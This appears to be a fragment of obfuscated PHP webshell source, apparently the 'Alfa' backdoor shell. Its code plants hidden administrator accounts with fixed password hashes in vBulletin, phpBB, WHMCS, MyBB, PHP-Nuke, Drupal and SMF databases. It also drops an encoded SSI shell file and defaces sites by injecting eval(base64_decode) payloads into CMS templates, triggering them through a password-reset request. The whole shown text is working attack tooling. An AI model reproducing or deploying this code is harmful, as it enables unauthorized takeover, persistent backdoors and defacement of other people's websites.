__alert("Success... " . $admin . " is created..."); } } } if ($_POST["alfa4"] && $_POST["alfa4"] == "vb") { echo __pre() . "<center><center><div class="txtfont_header">| vBulletin |<div><p>" . getConfigHtml("vb") . "</p><form onSubmit="g('pwchanger',null,'>>',this.localhost.value,this.database.value,'vb',this.username.value,this.password.value,this.prefix.value,this.admin.value,this.email.value); return false;" method="POST">"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix", "id" => "db_prefix", "inputName" => "prefix", "inputValue" => '', "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "hi", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true), "td8" => array("color" => "FF0000", "tdName" => "Admin Email", "inputName" => "email", "inputValue" => "[email protected]", "inputSize" => "50")); create_table($table); echo "<p><input value=" " name="send" type="submit"></p></form></center>"; if ($_POST["alfa1"] && $_POST["alfa1"] == ">>") { $localhost = $_POST["alfa2"]; $database = $_POST["alfa3"]; $username = $_POST["alfa5"]; $password = $_POST["alfa6"]; $prefix = $_POST["alfa7"]; $admin = $_POST["alfa8"]; $SQL = $_POST["alfa9"]; $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_connect_error()); $pw_col = @mysqli_connect("SELECT column_name FROM information_schema.columns where table_name = '{$prefix}user' and column_name = 'password' and table_schema = '{$database}'"); $pw_col = @mysqli_num_rows($pw_col); $adm_perm = "16744444"; if ($pw_col > 0) { $solevisible = @mysqli_query($conn, "insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','{$admin}','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*<QN','{$SQL}','" . date("Y-m-d") . "','" . time() . "')") or die(mysqli_error($conn)); } else { $adm_perm = "2143256444"; $solevisible = @mysqli_query($conn, "insert into {$prefix}user (userid,usergroupid,username,token,secret,email,passworddate,joindate,scheme,birthday_search) values(null,'6','{$admin}','$2y$10$YsVhV.9tLnzBYxar1BJAGO3vFz68/qDU7Jt62SDdLy6lUT9N5Z/wq','Qf~ADeA}iAey-&#ALQF<}/uBDqSnw>','{$SQL}','" . date("Y-m-d") . "','" . time() . "','blowfish:10','1984-05-20')") or die(mysqli_error($conn)); } $solevisible = @mysqli_query($conn, "select userid from {$prefix}user where username='" . $admin . "'") or die(mysqli_error($conn)); $sole = mysqli_num_rows($solevisible); if ($sole == 1) { $solevis = mysqli_fetch_assoc($solevisible); $res = $solevis["userid"]; } $solevisible = @mysqli_query($conn, "insert into {$prefix}administrator (userid,adminpermissions) values('" . $res . "','" . $adm_perm . "')") or die(mysqli_error($conn)); if ($solevisible) { __alert("Success... " . $admin . " is created..."); } } } if (isset($_POST["alfa5"]) && $_POST["alfa5"] == "phpbb") { echo __pre() . "<center><div class="txtfont_header">| phpBB |</div><p><p>" . getConfigHtml("phpbb") . "</p><form onSubmit="g('pwchanger',null,'>>',this.localhost.value,this.database.value,this.username.value,'phpbb',this.password.value,null,this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix", "id" => "db_prefix", "inputName" => "prefix", "inputValue" => '', "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "toftof", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true), "td8" => array("color" => "FF0000", "tdName" => "Admin Email", "inputName" => "email", "inputValue" => "[email protected]", "inputSize" => "50")); create_table($table); echo "<p><input value=" " name="send" type="submit"></p></form></center>"; if ($_POST["alfa1"] && $_POST["alfa1"] == ">>") { $localhost = $_POST["alfa2"]; $database = $_POST["alfa3"]; $username = $_POST["alfa4"]; $password = $_POST["alfa6"]; $admin = $_POST["alfa8"]; $SQL = $_POST["alfa9"]; $prefix = $_POST["alfa10"]; $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); $hash = md5("solevisible"); $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET username_clean ='" . $admin . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn)); $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_password ='" . $hash . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn)); $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET username_clean ='" . $admin . "' WHERE user_type = 3") or die(mysqli_error($conn)); $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_password ='" . $hash . "' WHERE user_type = 3") or die(mysqli_error($conn)); $solevisible = @mysqli_query($conn, "UPDATE " . $prefix . "users SET user_email ='" . $SQL . "' WHERE username_clean = 'admin'") or die(mysqli_error($conn)); if ($solevisible) { __alert("Success... " . $admin . " is created..."); } } } if (isset($_POST["alfa6"]) && $_POST["alfa6"] == "whmcs") { echo __pre() . "<center><div class="txtfont_header">| Whmcs |</div><p><p>" . getConfigHtml("whmcs") . "</p><form onSubmit="g('pwchanger',null,'>>',this.localhost.value,this.database.value,this.username.value,this.password.value,'whmcs',null,this.admin.value,this.email.value); return false;" method="POST">"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "toftof", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true), "td8" => array("color" => "FF0000", "tdName" => "Admin Email", "inputName" => "email", "inputValue" => "[email protected]", "inputSize" => "50")); create_table($table); echo "<p><input value=" " name="send" type="submit"></p></form></center>"; if ($_POST["alfa1"] && $_POST["alfa1"] == ">>") { $localhost = $_POST["alfa2"]; $database = $_POST["alfa3"]; $username = $_POST["alfa4"]; $password = $_POST["alfa5"]; $admin = $_POST["alfa8"]; $SQL = $_POST["alfa9"]; $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); $solevisible = @mysqli_query($conn, "insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','" . $admin . "','d4a590caacc0be55ef286e40a945ea45','" . $SQL . "','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn)); if ($solevisible) { __alert("Success... " . $admin . " is created..."); } } } if (isset($_POST["alfa7"]) && $_POST["alfa7"] == "mybb") { echo __pre() . "<center><div class="txtfont_header">| Mybb |</div><p><p>" . getConfigHtml("mybb") . "</p><form onsubmit="g('pwchanger',null,'>>',this.localhost.value,this.database.value,this.username.value,this.password.value,null,'mybb',this.admin.value,this.email.value,this.prefix.value); return false;" method="POST">"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix", "id" => "db_prefix", "inputName" => "prefix", "inputValue" => '', "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "toftof", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true), "td8" => array("color" => "FF0000", "tdName" => "Admin Email", "inputName" => "email", "inputValue" => "[email protected]", "inputSize" => "50")); create_table($table); echo "<p><input value=" " name="send" type="submit"></p></form></center>"; if ($_POST["alfa1"] && $_POST["alfa1"] == ">>") { $localhost = $_POST["alfa2"]; $database = $_POST["alfa3"]; $username = $_POST["alfa4"]; $password = $_POST["alfa5"]; $admin = $_POST["alfa8"]; $SQL = $_POST["alfa9"]; $prefix = $_POST["alfa10"]; $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); $solevisible = @mysqli_query($conn, "insert into " . $prefix . "users (uid,username,password,salt,email,usergroup) values(null,'" . $admin . "','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','" . $SQL . "','4')") or die(mysqli_error($conn)); if ($solevisible) { __alert("Success... " . $admin . " is created..."); } } } if (isset($_POST["alfa8"]) && $_POST["alfa8"] == "nuke") { echo __pre() . "<center><div class="txtfont_header">| PhpNuke |</div><p><p>" . getConfigHtml("phpnuke") . "</p><form onsubmit="g('pwchanger',null,'>>',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,'nuke',this.email.value,this.prefix.value); return false;" method="POST">"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix", "id" => "db_prefix", "inputName" => "prefix", "inputValue" => '', "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "toftof", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true), "td8" => array("color" => "FF0000", "tdName" => "Admin Email", "inputName" => "email", "inputValue" => "[email protected]", "inputSize" => "50")); create_table($table); echo "<p><input value=" " name="send" type="submit"></p></form></center>"; if ($_POST["alfa1"] && $_POST["alfa1"] == ">>") { $localhost = $_POST["alfa2"]; $database = $_POST["alfa3"]; $username = $_POST["alfa4"]; $password = $_POST["alfa5"]; $admin = $_POST["alfa7"]; $SQL = $_POST["alfa9"]; $prefix = $_POST["alfa10"]; $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); $hash = md5($pwd); $solevisible = @mysqli_query($conn, "insert into " . $prefix . "_authors(aid,name,email,pwd) values('{$admin}','God','{$SQL}','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn)); if ($solevisible) { __alert("Success... " . $admin . " is created..."); } } } if (isset($_POST["alfa9"]) && $_POST["alfa9"] == "drupal") { echo __pre() . "<center><div class="txtfont_header">| Drupal |</div><p><p>" . getConfigHtml("drupal") . "</p><form onSubmit="g('pwchanger',null,'>>',this.localhost.value,null,this.database.value,this.username.value,this.password.value,null,this.admin.value,'drupal'); return false;" method="POST">"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "toftof", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true)); create_table($table); echo "<p><input value=" " name="send" type="submit"></p></form></center>"; if ($_POST["alfa1"] && $_POST["alfa1"] == ">>") { $localhost = $_POST["alfa2"]; $database = $_POST["alfa4"]; $username = $_POST["alfa5"]; $password = $_POST["alfa6"]; $admin = $_POST["alfa8"]; $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); $getDescuid = @mysqli_query($conn, "select uid from users order by uid desc limit 0,1"); $getDescuid = @mysqli_fetch_assoc($getDescuid); $getDescuid = $getDescuid["uid"]; $getdescuid = $getDescuid++; $solevisible = @mysqli_query($conn, "insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('{$getDescuid}','{$admin}','$S$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','[email protected]','filtered_html','1','Europe/Berlin','[email protected]')") or die(mysqli_error($conn)); $solevisible = @mysqli_query($conn, "select uid from users where name='" . $admin . "'") or die(mysqli_error($conn)); $sole = mysqli_num_rows($solevisible); if ($sole == 1) { $solevis = mysqli_fetch_assoc($solevisible); $res = $solevis["uid"]; } $solevisible = @mysqli_query($conn, "INSERT INTO users_roles (uid,rid) VALUES ('" . $res . "', '3')") or die(mysqli_error($conn)); if ($solevisible) { __alert("Success... " . $admin . " is created..."); } } } if (isset($_POST["alfa10"]) && $_POST["alfa10"] == "smf") { echo __pre() . "<center><center><div class="txtfont_header">| SMF |</div><p><p>" . getConfigHtml("smf") . "</p><form onSubmit="g('pwchanger',null,'>>',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,'smf'); return false;" method="POST">"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "id" => "db_host", "inputName" => "localhost", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "id" => "db_name", "inputName" => "database", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "id" => "db_user", "inputName" => "username", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "id" => "db_pw", "inputName" => "password", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix", "id" => "db_prefix", "inputName" => "prefix", "inputValue" => "smf_", "inputSize" => "50"), "td6" => array("color" => "FF0000", "tdName" => "Admin User", "inputName" => "admin", "inputValue" => "admin", "inputSize" => "50"), "td7" => array("color" => "FF0000", "tdName" => "Admin Pass", "inputName" => "hi", "inputValue" => "solevisible", "inputSize" => "50", "disabled" => true)); create_table($table); echo "<p><input value=" " name="send" type="submit"></p></form></center>"; if ($_POST["alfa1"] && $_POST["alfa1"] == ">>") { $localhost = $_POST["alfa2"]; $database = $_POST["alfa3"]; $username = $_POST["alfa5"]; $password = $_POST["alfa6"]; $prefix = $_POST["alfa7"]; $admin = $_POST["alfa8"]; $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn)); $setpwAlg = sha1(strtolower($admin) . "solevisible"); $solevisible = @mysqli_query($conn, "insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'{$admin}','1','{$admin}','{$setpwAlg}','[email protected]')") or die(mysqli_error($conn)); if ($solevisible) { __alert("Success... " . $admin . " is created..."); } } } echo "</div>"; alfafooter(); } goto y_pCK; pHU3v: @set_time_limit(0); goto vrpxi; Gg7XK: function alfaHijackCms($cms, $cmspath, $saveto) { switch ($cms) { case "vb": hijackvBulletin($cmspath, $saveto); break; case "wp": hijackwp($cmspath, $saveto); break; case "jom": hijackJoomla($cmspath, $saveto); break; case "whmcs": hijackWhmcs($cmspath, $saveto); break; case "mybb": hijackMybb($cmspath, $saveto); break; case "ipb": hijackIPB($cmspath, $saveto); break; case "phpbb": hijackPHPBB($cmspath, $saveto); break; default: echo "error!"; break; } } goto K84I1; YQHDC: function __read_file($file, $boom = true) { $content = false; if ($fh = @fopen($file, "rb")) { $content = ''; while (!feof($fh)) { $content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192); } @fclose($fh); } if (empty($content) || !$content) { $content = alfaEx("cat '" . addslashes($file) . "'"); } return $content; } goto W1jEp; PuSe1: function alfa_getColor($target) { if (isset($GLOBALS["DB_NAME"]["color"][$target]) && $GLOBALS["DB_NAME"]["color"][$target] != '') { return $GLOBALS["DB_NAME"]["color"][$target]; } else { $target = $GLOBALS["__ALFA_COLOR__"][$target]; if (is_array($target)) { return $target["key_color"]; } else { return $target; } } } goto B6o6w; xSGgd: function alfassiShell() { alfahead(); echo "<div class=header>"; alfaCreateParentFolder(); @chdir($GLOBALS["home_cwd"] . "/" . __ALFA_DATA_FOLDER__); @mkdir("alfa_shtml", 493); @chdir("alfa_shtml"); alfacgihtaccess("shtml"); $code = "rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw=="; @__write_file("alfa_ssi.shtml", __get_resource($code)); @chmod("alfa_ssi.shtml", 493); echo AlfaiFrameCreator("alfa_shtml/alfa_ssi.shtml"); echo "</div>"; alfafooter(); } goto kr6dX; ulFiJ: $baslik = "Shell Backdoor Datang !!!"; goto BO4nz; aI70a: if (!function_exists("posix_getgrgid") && strpos(@ini_get("disable_functions"), "posix_getgrgid") === false) { function posix_getgrgid($p) { return false; } } goto EN_gw; KOYJ5: function alfaIndexChanger() { alfahead(); echo "<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g('IndexChanger',null,null,null,'whmcs')">| Whmcs | </a><a href=javascript:void(0) onclick="g('IndexChanger',null,'vb',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g('IndexChanger',null,null,'mybb')">| MyBB | </a></h3></center>"; if (isset($_POST["alfa3"]) && $_POST["alfa3"] == "whmcs") { echo __pre(); echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
<p><center>" . getConfigHtml("whmcs") . "<form onSubmit="g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;">\xa"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "inputName" => "dbh", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "URL", "inputName" => "path", "inputValue" => "http://site.com/whmcs", "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "File Name", "inputName" => "fname", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Name", "inputName" => "dbn", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Db User", "inputName" => "dbu", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td6" => array("color" => "FFFFFF", "tdName" => "Db Pass", "inputName" => "dbp", "id" => "db_pw", "inputValue" => '', "inputSize" => "50")); create_table($table); echo "<br><div class='txtfont'>| Your Index |</div><br>
<textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>\xa<input type='submit' value=' '>
</form></center></center>"; if (isset($_POST["alfa6"])) { $s0levisible = "Powered By Solevisible"; $dbu = $_POST["alfa6"]; $path = $_POST["alfa5"]; $fname = $_POST["alfa4"]; $dbn = $_POST["alfa7"]; $dbp = $_POST["alfa8"]; $dbh = $_POST["alfa9"]; $index = $_POST["alfa10"]; $index = str_replace("\'", "'", $index); $deface = "$x = base64_decode("" . __ZW5jb2Rlcg($index) . ""); $solevisible = fopen("" . $fname . "","w"); fwrite($solevisible,$x);"; $saveData = __ZW5jb2Rlcg($deface); $Def = "{php}eval(base64_decode("" . $saveData . ""));{/php}"; if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) { $conn = @mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn)); $soleSave = @mysqli_query($conn, "select message from tblemailtemplates where name='Password Reset Validation'"); $soleGet = mysqli_fetch_assoc($soleSave); $tempSave1 = $soleGet["message"]; $tempSave = str_replace("'", "\'", $tempSave1); $inject = "UPDATE tblemailtemplates SET message='{$Def}' WHERE name='Password Reset Validation'"; $result = @mysqli_query($conn, $inject) or die(mysqli_error($conn)); $create = "insert into tblclients (email) values('[email protected]')"; $result2 = @mysqli_query($conn, $create) or die(mysqli_error($conn)); if (function_exists("curl_version")) { $AlfaSole = new AlfaCURL(true); $saveurl = $AlfaSole->Send($path . "/pwreset.php"); $getToken = preg_match("/name="token" value="(.*?)"/i", $saveurl, $token); $AlfaSole->Send($path . "/pwreset.php", "post", "token={$token[1]}&action=reset&[email protected]"); $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'"; $Solevisible = mysqli_query($conn, $backdata) or die(mysqli_error($conn)); __alert("File Created..."); echo "<br><pre id="strOutput" style="margin-top:5px" class="ml1"><br><center><font color=red><a target='_blank' href='" . $path . "/" . $fname . "'>Click Here !</a></font></b></center><br><br>"; } else { echo "<br><pre id="strOutput" style="margin-top:5px" class="ml1"><br><center><b><font color="#FFFFFF">Please go to Target </font><font color=red>" " . $path . "/pwreset.php "</font><br/><font color="#FFFFFF"> and reset password with email</font> => <font color=red>[email protected]</font><br/><font color="#FFFFFF">and go to</font> <font color=red>" " . $path . "/" . $fname . " "</font></b></center><br><br>"; } } } } if (isset($_POST["alfa1"]) && $_POST["alfa1"] == "vb") { echo __pre(); echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
<p><center>" . getConfigHtml("vb") . "<form onSubmit="g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;">
"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "inputName" => "dbh", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "inputName" => "dbn", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "inputName" => "dbu", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "inputName" => "dbp", "id" => "db_pw", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Prefix", "inputName" => "prefix", "id" => "db_prefix", "inputValue" => '', "inputSize" => "50")); create_table($table); echo "<br><div class='txtfont'>| Your Index |</div><br>
<textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
<input type='submit' value=' '></form></center></center>"; if ($_POST["alfa8"] == ">>") { $s0levisible = "Powered By Solevisible"; $dbu = $_POST["alfa2"]; $dbn = $_POST["alfa3"]; $dbp = $_POST["alfa4"]; $dbh = $_POST["alfa5"]; $index = $_POST["alfa6"]; $prefix = $_POST["alfa7"]; $index = str_replace("\'", "'", $index); $set_index = "{${eval(base64_decode(\'"; $set_index .= __ZW5jb2Rlcg("echo "{$index}";"); $set_index .= "\'))}}{${exit()}}"; if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) { $conn = @mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn)); $loli1 = "UPDATE " . $prefix . "template SET template='" . $set_index . '' . $s0levisible . "' WHERE title='spacer_open'"; $loli2 = "UPDATE " . $prefix . "template SET template='" . $set_index . '' . $s0levisible . "' WHERE title='FORUMHOME'"; $loli3 = "UPDATE " . $prefix . "style SET css='" . $set_index . '' . $s0levisible . "', stylevars='', csscolors='', editorstyles=''"; @mysqli_query($conn, $loli1) or die(mysqli_error($conn)); @mysqli_query($conn, $loli2) or die(mysqli_error($conn)); @mysqli_query($conn, $loli3) or die(mysqli_error($conn)); __alert("VB index changed...!"); } } } if (isset($_POST["alfa2"]) && $_POST["alfa2"] == "mybb") { echo __pre(); echo "<center><center><div class='txtfont_header'>| Mybb |</div>
<p><center>" . getConfigHtml("mybb") . "<form onSubmit="g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;" method=POST action=''>
"; $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Mysql Host", "inputName" => "mybbdbh", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Db Name", "inputName" => "mybbdbn", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db User", "inputName" => "mybbdbu", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db Pass", "inputName" => "mybbdbp", "id" => "db_pw", "inputValue" => '', "inputSize" => "50")); create_table($table); echo "<br><div class='txtfont'>| Your Index |</div><br>
<textarea name=mybbindex rows='19' cols='103'>
